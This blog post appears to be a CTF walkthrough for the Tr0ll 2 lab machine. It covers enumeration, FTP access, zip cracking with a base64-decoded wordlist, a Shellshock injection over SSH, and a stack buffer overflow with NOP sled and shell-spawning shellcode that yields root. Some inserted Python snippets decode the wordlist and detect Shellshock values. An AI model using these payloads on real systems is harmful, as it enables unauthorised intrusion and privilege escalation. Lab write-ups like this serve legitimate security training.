Sunday, August 4, 2019

Troll 2 Walkthrough

Reconnaissance / Enumeration

Let's start with a basic nmap scan of the target server.

nmap -A -sV -sC 192.168.1.77
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-26 12:42 PDT
Nmap scan report for 192.168.1.77
Host is up (0.00061s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 82:fe:93:b8:fb:38:a6:77:b5:a6:25:78:6b:35:e2:a8 (DSA)
|   2048 7d:a5:99:b8:fb:67:65:c9:64:86:aa:2c:d6:ca:08:5d (RSA)
|_  256 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:63:02:FD (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: Tr0ll; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.1.77

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.25 seconds

I tried an anonymous FTP login, but it failed.

Next, I checked whether the site has a robots.txt, and it does.

Here is a list of files found in the robots.txt file. 

Let's try noob and see what we get.  It looks like a picture, so let's look deeper than what the surface presents.


We get this trolled cat image in return.  Wait!  This might be steganography, so let's examine the picture more closely.  No: I couldn't find anything hidden in the image, so there is no steganography here.

Let's try the dont_bother folder and see what happens.  An easier way to check which robots.txt entries actually exist is to save them as a wordlist, load it into DirBuster and test each one.


Don't read the previous walkthroughs, because the creator might change the solutions to test our CTF skills.

Deep within y0ur_self for the answer

Something odd inside the dont_bother folder is a y0ur_self directory, which looks like it may lead to something secretive.  Let's test that out.  It contains what looks like a base64-encoded password list.

First, we must download the text file onto our computer.  

wget http://192.168.1.77/y0ur_self/answer.txt

Next, we must decode the list and make a password list out of it.  

Looking back at the source of http://192.168.1.77/, we can see some clues that lead us to the password for the FTP server.

They are:

username: Tr0ll
password:  Tr0ll

Let's try those credentials on the FTP server.

Bingo!  It worked for the ftp server.  

Let's download lmao.zip and see what we get.  

Unfortunately, it gets harder, because the zip file is password-protected.

Let's see what we can get out of the decoded base64 "password" file.

First, let's sort the file answerDecoded.txt by doing a:

cat answerDecoded.txt | sort
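The decode-and-sort step above, as an added example that is not part of the original walkthrough: it turns a file of one base64 string per line into a sorted, de-duplicated wordlist, skipping lines that are not valid base64 instead of aborting. The SAMPLE_ANSWER_TXT values are constructed for this example (the real answer.txt is much longer), and the file names in the __main__ block follow the walkthrough.

```python
import base64
import binascii

# Constructed stand-in for the first lines of answer.txt: one base64 string
# per line. The values are made up for this example, including one bad line
# and one duplicate, to show how the decoder handles them.
SAMPLE_ANSWER_TXT = """\
c2VjcmV0MTIz
SXRDYW50UmVhbGx5QmVUaGlzRWFzeVJpZ2h0TE9M
cGFzc3dvcmQ=
not!base64
c2VjcmV0MTIz

"""


def decode_wordlist(text):
    """Decode one base64 value per line into a sorted, de-duplicated list.

    Lines that are not valid base64, or that do not decode to UTF-8 text,
    are skipped rather than aborting the whole run, so a single bad line in
    a long list does not leave you with an empty wordlist.
    """
    words = set()
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            raw = base64.b64decode(line, validate=True)
            word = raw.decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64 / not text: skip it
        if word:
            words.add(word)
    return sorted(words)


if __name__ == "__main__":
    # Equivalent of the walkthrough's decode step followed by sort:
    # read answer.txt from the current directory, write answerDecoded.txt.
    with open("answer.txt") as fh:
        decoded = decode_wordlist(fh.read())
    with open("answerDecoded.txt", "w") as out:
        out.write("\n".join(decoded) + "\n")
    print(f"{len(decoded)} candidate passwords written to answerDecoded.txt")
```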

I will now use my Python zip cracker at https://gist.github.com/natekhchan/841b8332e71aef3b4ae8049672f680bf to try the decoded list against the zip file.

The cracker finds the password:  ItCantReallyBeThisEasyRightLOL
Once extracted, the archive contains a file named noob, which is an RSA private key.


We now have noob's private key.

We chmod 600 the key, since ssh refuses to use a private key that other users can read.

Then we connect with ssh noob@192.168.1.77 -i noob

root@kali:~/Desktop/troll2# chmod 600 noob
root@kali:~/Desktop/troll2# ssh noob@192.168.56.101 -i noob
TRY HARDER LOL!
Connection to 192.168.56.101 closed.

We get back a message saying that the connection is closed.  

But something on the login path, presumably the noob account's .bashrc, must be echoing TRY HARDER LOL! and closing the session.

Let's check whether the server is vulnerable to Shellshock (bash importing a function definition from an environment variable and running the command appended to it).  It is indeed.

root@kali:~# ssh noob@192.168.1.77 -i noob -t '() { :;}; /bin/bash'
noob@Tr0ll2:~$ id
uid=1002(noob) gid=1002(noob) groups=1002(noob)
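Added detection example, not part of the original walkthrough: the probe above works because sshd hands the client's requested command to a forced command as SSH_ORIGINAL_COMMAND, and an unpatched bash imported any environment value beginning with the four characters "() {" as a function definition and then ran whatever followed the body. This script scans an environment-style mapping for that shape; SAMPLE_ENV is constructed for the example (standard sshd/CGI variable names, made-up values).

```python
import re

# Vulnerable bash (CVE-2014-6271) treated an environment value that starts
# with the literal "() {" as a function definition and kept parsing after
# the closing brace, so a trailing command ran at import time.
SHELLSHOCK_RE = re.compile(r"^\(\) \{.*?\}\s*;?\s*(?P<tail>.*)$", re.DOTALL)

# Constructed environment as a forced command or CGI handler might see it.
# SSH_ORIGINAL_COMMAND is exactly where the walkthrough's probe ends up.
SAMPLE_ENV = {
    "SSH_ORIGINAL_COMMAND": "() { :;}; /bin/bash",
    "HTTP_USER_AGENT": "Mozilla/5.0 (X11; Linux)",
    "TERM": "xterm-256color",
    "HTTP_COOKIE": "() { ignored; }; echo vulnerable",
    "SCRIPT": "f() { echo hi; }",   # a normal function body, not the import shape
}


def find_shellshock(env):
    """Return (variable, trailing_command) for every value shaped like a
    Shellshock payload. An empty trailing command still counts: that is the
    bare probe shape and is worth logging on its own."""
    hits = []
    for name, value in env.items():
        match = SHELLSHOCK_RE.match(value)
        if match:
            hits.append((name, match.group("tail").strip()))
    return hits


if __name__ == "__main__":
    for name, cmd in find_shellshock(SAMPLE_ENV):
        print(f"{name}: function-definition prefix, trailing command {cmd!r}")
```

Patched bash only imports functions from specially named BASH_FUNC_* variables and ignores anything after the function body, so on a patched host these values are inert but still worth alerting on.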
 
After logging in, we upgrade to a proper TTY with Python's pty module.

Here are the commands we ran and what the enumeration turned up.

noob@Tr0ll2:~$ ls
noob@Tr0ll2:~$ cd ..
noob@Tr0ll2:/home$ ls
maleus    noob  tr0ll
noob@Tr0ll2:/home$ cd tr0ll
noob@Tr0ll2:/home/tr0ll$ ls
lmao.zip
noob@Tr0ll2:/home/tr0ll$ whoami
noob
noob@Tr0ll2:/home/tr0ll$ python -c 'import pty; pty.spawn("/bin/bash")'
noob@Tr0ll2:/home/tr0ll$ uname -a
Linux Tr0ll2 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux
noob@Tr0ll2:/home/tr0ll$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04.1 LTS"
noob@Tr0ll2:/home/tr0ll$ cd /
noob@Tr0ll2:/$ ls
noob@Tr0ll2:/$ cd /nothing_to_see_here/
noob@Tr0ll2:/nothing_to_see_here$ ls
choose_wisely
noob@Tr0ll2:/nothing_to_see_here$ cd choose_wisely/
noob@Tr0ll2:/nothing_to_see_here/choose_wisely$ ls
door1  door2  door3
noob@Tr0ll2:/nothing_to_see_here/choose_wisely$ cd door1
noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ ls
r00t
noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ cd ..
noob@Tr0ll2:/nothing_to_see_here/choose_wisely$ ls -la
total 20
drwsr-xr-x 5 root root 4096 Oct  4  2014 .
drwsr-xr-x 3 root root 4096 Jul 30 13:00 ..
drwsr-xr-x 2 root root 4096 Oct  5  2014 door1
drwsr-xr-x 2 root root 4096 Oct  4  2014 door2
drwsr-xr-x 2 root root 4096 Oct  5  2014 door3
noob@Tr0ll2:/nothing_to_see_here/choose_wisely$ du -sh *
16K    door1
12K    door2
12K    door3
noob@Tr0ll2:/nothing_to_see_here/choose_wisely$


Now let's fuzz the number of A's it takes to overwrite the saved return address and crash r00t with an illegal instruction.

./r00t $(python -c 'print "A" *300')

That is when we can inject code into the process.  

From gdb we find that the stack pointer (ESP) is 0xbffffb70 after the crash.  The memory at that address holds our own input rather than program code, so we overwrite the return address with 0xbffffb70 and place shellcode there that spawns a bash shell.  I found the shellcode to spawn a bash shell on this website.

Program received signal SIGILL, Illegal instruction.
0xb7e45400 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
(gdb) i r esp
esp            0xbffffb70    0xbffffb70
(gdb)

Our payload also includes "\x90" * 1000 as a NOP sled, so execution only has to land somewhere in the sled to slide into the shellcode.

./r00t $(python -c 'print "A"*268 + "\x70\xfb\xff\xbf" + "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')


noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door3$ ./r00t $(python -c 'print "A"*268 + "\x70\xfb\xff\xbf" + "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
AAAAAAAAAAAAAAAA[... echoed argument truncated ...]
# cd /root
# ls
Proof.txt  core2  core4  hardmode  ran_dir.py
core1       core3  goal     lmao.zip  reboot
# id
uid=1002(noob) gid=1002(noob) euid=0(root) groups=0(root),1002(noob)
# cat Proof.txt
You win this time young Jedi...

a70354f0258dcc00292c72aab3c8b1e4 

Just r00ted tr0ll2.  :)  SUCCESS!! :)

